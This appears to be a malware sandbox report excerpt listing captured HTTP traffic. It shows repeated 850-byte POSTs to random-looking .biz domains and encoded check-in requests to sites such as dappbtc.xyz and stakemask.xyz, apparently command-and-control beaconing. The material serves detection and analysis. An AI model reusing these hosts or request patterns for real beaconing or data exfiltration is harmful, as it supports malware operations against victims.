            Source: global traffic HTTP traffic detected: GET /aosibypyx?usid=24&utid=11154196211 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww7.przvgke.biz
            Source: global traffic HTTP traffic detected: POST /o HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /fufjgjyissa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /xqy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: GET /j422/?46X=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98=&iR=Nv5PUh6XCNMP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.minimalbtc.xyz Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /hsovbw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /pyxq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepwork.cafe Origin: http://www.deepwork.cafe Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.deepwork.cafe/pyxq/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /pyxq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepwork.cafe Origin: http://www.deepwork.cafe Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.deepwork.cafe/pyxq/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /pyxq/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.deepwork.cafe Origin: http://www.deepwork.cafe Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 6476 Referer: http://www.deepwork.cafe/pyxq/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /mlrrqn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vjaxhpbji.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: GET /pyxq/?46X=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&iR=Nv5PUh6XCNMP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.deepwork.cafe Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /jrcjllgytrwdiwa HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /coluyqqcxrllujv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /kifgnlhjpkkxtxqp HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: saytjshyf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /mbtmlu HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vcddkls.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /4udu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dresses-executive.sbs Origin: http://www.dresses-executive.sbs Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 200 Referer: http://www.dresses-executive.sbs/4udu/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /iynbmylcmibn HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: fwiwk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: GET /iynbmylcmibn?usid=24&utid=11154212164 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Host: ww12.fwiwk.biz
            Source: global traffic HTTP traffic detected: POST /4udu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dresses-executive.sbs Origin: http://www.dresses-executive.sbs Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 220 Referer: http://www.dresses-executive.sbs/4udu/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global traffic HTTP traffic detected: POST /ekvacjbfhlcxed HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: tbjrpv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /hekha HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: deoci.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
            Source: global traffic HTTP traffic detected: POST /4udu/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Host: www.dresses-executive.sbs Origin: http://www.dresses-executive.sbs Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 6476 Referer: http://www.dresses-executive.sbs/4udu/ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /jaff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ceggfmhqcflw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /lshwgnqb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /4udu/?46X=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /hgdoyscfx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwwwatrrjcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /desvnwm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /khd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xslmmkpqbqgjieb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ni HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /sbsmjuxlxkjmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /oofweypn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /ryl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xitkiwvxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /pdwrkjpvy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /sri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /svogkqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /7bzp/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.dappbtc.xyzOrigin: http://www.dappbtc.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.dappbtc.xyz/7bzp/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /cywpqy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /mklf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: GET /7bzp/?46X=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&iR=Nv5PUh6XCNMP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /md HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xratnw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gaqxnqmquyb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /xgcio HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /bgetrgyagt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /muttjirlpdgbukm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /gwo6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.stakemask.xyzOrigin: http://www.stakemask.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.stakemask.xyz/gwo6/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
            Source: global trafficHTTP traffic detected: POST /qfvxeaopmentlx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /eppcwlxjodqddevc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
            Source: global trafficHTTP traffic detected: POST /dcsip HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
